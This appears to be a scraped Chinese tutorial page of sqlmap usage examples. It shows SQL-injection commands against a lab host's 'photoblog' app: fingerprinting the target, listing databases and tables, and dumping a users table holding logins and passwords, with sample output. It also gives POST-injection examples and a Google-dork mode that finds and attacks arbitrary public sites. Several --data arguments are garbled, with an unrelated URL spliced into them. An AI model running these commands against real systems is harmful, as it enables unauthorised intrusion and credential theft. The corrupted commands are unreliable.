首页 > 代码库 > sqlmap 使用举例

sqlmap 使用举例

详细的请见:

http://drops.wooyun.org/tips/143 

http://wenku.baidu.com/link?url=45xj6EVVWQjV8upwrBAMIqPP3xMcmi6Zh2pGe27sZ6TZbsBtPJ3QjuIIz672egOe96UCt6T3LuPmczJIUGECmcEQLDRQ3DhYE4qGUmRhDLK

 

1. 检测特定url一个参数的get:

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -v 3 -f --banner

–flush-session #刷新当前目标的会话文件–fresh-queries #忽略在会话文件中存储的查询结果
-v 3 #显示检测过程中的payload

 

列出所有的库和表:

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1"  --dump-all -v 0

 

 

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --users

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner --dbs

available databases [2]:[*] information_schema[*] photoblog

 

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" --tables

Database: photoblog[3 tables]+------------+| categories || pictures   || users      |+------------+

 

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1" -f --banner -D "photob
log" -T "users" --columns

 

Database: photoblogTable: users[3 columns]+----------+--------------+| Column   | Type         |+----------+--------------+| id       | mediumint(9) || login    | varchar(50)  || password | varchar(50)  |+----------+--------------+

 

python sqlmap.py -u "http://192.168.118.138/cat.php?id=1"  --dump -D "photoblog"
 -T "users" --columns

 

 

2. 检测特定url一个参数的post:

python sqlmap.py -u "http://192.168.118.138/cat.php" --data="http://www.mamicode.com/id=1" -v 3 -f --banner

当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。例子:python sqlmap.py -u "http://www.target.com/vuln.php" --data="http://www.mamicode.com/query=foobar;id=1" --param-del=";" -f --banner --dbs --users

 

3. 检测google搜索出的结果

python sqlmap.py -g "inurl:\".php?id=1\""

sqlmap 使用举例